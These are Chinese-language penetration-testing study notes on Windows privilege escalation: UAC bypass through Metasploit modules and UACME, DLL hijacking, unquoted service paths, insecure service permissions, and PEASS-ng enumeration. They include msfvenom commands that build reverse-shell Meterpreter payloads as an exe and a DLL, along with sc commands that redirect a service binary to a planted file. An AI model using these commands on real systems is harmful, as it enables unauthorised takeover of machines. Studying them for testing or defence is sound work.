UAC(User Account Control 的缩写,即用户账户控制)
win7之后有
win+R
输入msconfig


就是我们平常弹出来的 “是否允许此应用对你的设备进行修改”

Win10&11-BypassUAC 自动提权-MSF&UACME
为了远程执行目标的 exe 或者 bat 可执行文件需要绕过此安全机制
在用户到系统权限自动提权中也学通过 BypassUAC 实现自动化提权
绕过项目:MSF 内置,Powershe11渗透框架,UACME项目(推荐)
开启 UAC 和未开启 UAC 时,CS/MSF 默认 getsystem 提权影响(进程注入等)
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx xx.xx.xx lport=xx -f exe -o msf.exe

1、MSF 模块:
use exploit/windows/local/askuse #钓鱼式的 一般不推荐
use exploit/windows/local/bypassua #针对win7
use exploit/windows/local/bypassuac_sluihijack #针对win10、11
use exploit/windows/local/bypassuac_silentcleanup #针对win10、11






2、UACME 项目
https://github.com/hfiref0x/UACME
Akagi64.exe 编号 调用执行
编译sln为exe







WindowS-DLL劫持提权应用配合MSF-FlashFXP

原理:
windows 程序启动的时候需要 DLL。如果这些 DLL不存在,则可以通过在应用程序要查找的位置放置恶意 DLL来提权。通常,windows 应用程序有其预定义好的搜索DLL 的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)
取决于对这个目录的操作权限
过程:
信息收集-进程调试-制作 d11 并上传-替换 a11-等待启动应用成功
获取权限后 看到这个软件 然后自己从网,上下载,看这个exe运行的时候 会加载哪些d



检测:
火绒剑项目:https://github.com/anhkgg/anhkgg-tools
利用火绒剑进行进程分析加载 DLL,一般寻程序 DLL, 利用。



msf上线
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=xx-f dll -o xiaodi.dll
提前信息收集相关软件及 DLL 问题程序,本地调试成功后覆盖 DLL 实现利用




触发的方式:
1.服务器开机自动加载
2.管理员自动打开



Windows-不带引号服务路径配合 MSF-MacroExpert
原理:
服务路径配置由于目录空格问题,可上传文件配合解析恶意触发执行


路径带空格并且没有使用引号,存在安全问题

过程:
检测服务权限配置-制作文件并上传-服务路径指向解析-等待调用成功
检测命令:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
上传反弹 exe,设置好对应执行名后,执行sc start "Macro Expert"

利用:


只要执行c:\program files(x86)\grasssoft\macro)expertiMacroservice.exe
服务,msf就可以上线


win2012-不安全的服务权限配合MSF-NewServices
原理:
即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:
检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
检测脚本:
accesschk.exe -uwcqv "" *
accesschk.exe -uwcqv "administrator" * #检测这个用户所能操作的服务权限
sc config "test" binpath= "C:\Program.exe"
sc start test
sc config "test" binpath= "C:\Program.exe"
主要作用是修改名为 test
的系统服务的可执行文件路径。
sc
:是 Windows 的服务控制命令行工具,用于管理系统服务(创建、启动、停止、配置等)。config "test"
:表示要配置名为test
的服务(test
是服务的名称,而非显示名称)。binpath= "C:\Program.exe"
:指定服务对应的可执行文件路径,这里将路径设置为C:\Program.exe
(注意binpath=
后面有一个空格,这是sc
命令的语法要求)。







比较鸡肋 安装的软件都是administrator或者安装的管理员用户有权限 普通用户一般没有权限 但是administrator直接msf getsystem提权就可以
综合类检测项目
https://github.com/carlospolop/PEASS-ng
IPEAS-ng 适用于windows 和 Linux/Unix*和MacOs 的权限提升工具。
winPEAS.bat > result.txt
winPEASany.exe log=result.txt
找到的信息 根据当前获取的权限所决定


